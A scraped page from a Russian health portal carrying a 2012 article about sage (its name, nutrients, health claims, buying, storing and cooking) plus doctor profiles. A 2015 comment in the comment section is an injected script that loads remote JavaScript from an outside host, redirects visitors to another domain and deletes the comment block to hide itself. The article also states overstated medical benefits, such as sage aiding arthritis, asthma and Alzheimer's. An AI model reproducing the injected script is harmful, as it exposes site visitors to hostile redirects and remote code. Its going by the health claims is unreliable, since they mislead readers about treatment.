Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Шалфей: продукт для иммун...  >>  Шалфей: продукт для иммунитета и хорошей памяти
 
Обратная связь
 

Шалфей: продукт для иммунитета и хорошей памяти

Размер шрифта
24 января 2012 09:00
  • google_analytics: false
  • Нравится

Почему шалфей получил такое название? Какая польза в этом растении? Как выбрать, как хранить и как готовить шалфей вы узнаете из этой статьи.

1

Название этой травы происходит от латинского salvare, то есть «быть здоровым».Всего в мире существует 900 видов шалфея, среди которых есть и лечебные. Но в большинстве случаев сейчас эту траву используют в качестве пряности.

В шалфее много эфирных масел, биофлавоноидов, укрепляющих клеточные стенки, обеззараживающих фитанцидов. Из шалфея получают тонизирующую камфору. Это вещество оказывает возбуждающее воздействие на сердце, но в последние годы лекарства на основе камфоры практически не применяются: выяснилось, что камфора обладает нежелательными побочными действиями.

Шалфей содержит антиоксиданты, которые влияют на обмен кислорода и защищают клетки от разрушения. Избыток свободных радикалов приводит к развитию хронического воспаления. Поэтому шалфей рекомендуется тем пациентам, у кого есть ревматоидный артрит, бронхиальная астма и атеросклероз.

Пьедестал почета по содержанию биофлавоноидов

Шалфей 23 мг
Розмарин 19 мг
Календула 13 мг

Шалфей улучшает память, в его корне найдены вещества, используемые для лечения болезни Альцгеймера.

1

Как выбрать

  • Покупать шалфей лучше свежий. Посмотрите, когда был собран шалфей. Срок его хранения – не больше 3-х суток. Листья свежего шалфея должны быть темно-зеленого цвета; на них не должно быть желтых или темных пятен.
  • Сухая трава должна быть в герметичной упаковке. Иначе шалфей впитает влагу и растеряет свои полезные свойства.

Как хранить

  • Свежую траву поставить в емкость с водой. Можно поместить в специальный контейнер, откуда влага будет испарятся медленнее.
  • Специи можно приготовить самостоятельно. Необходимо высушить листья при температуре не ниже 35 градусов, желательно на воздухе, либо в слаборазогретой духовке. Затем порубить в кофемолке или блендере. Хранить в закрытой емкости до 1,5 лет.

Как готовить

Если нет возможности съесть свежий шалфей, можно приготовить теплый салат из овощей al dente с заправкой из лука и шалфея (50 г лука, 20 г бальзамического уксуса, 20 г оливкого масла, 5 листов свежего шалфея).


Сюжеты по теме:
Шалфей. Ровесник медицины

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.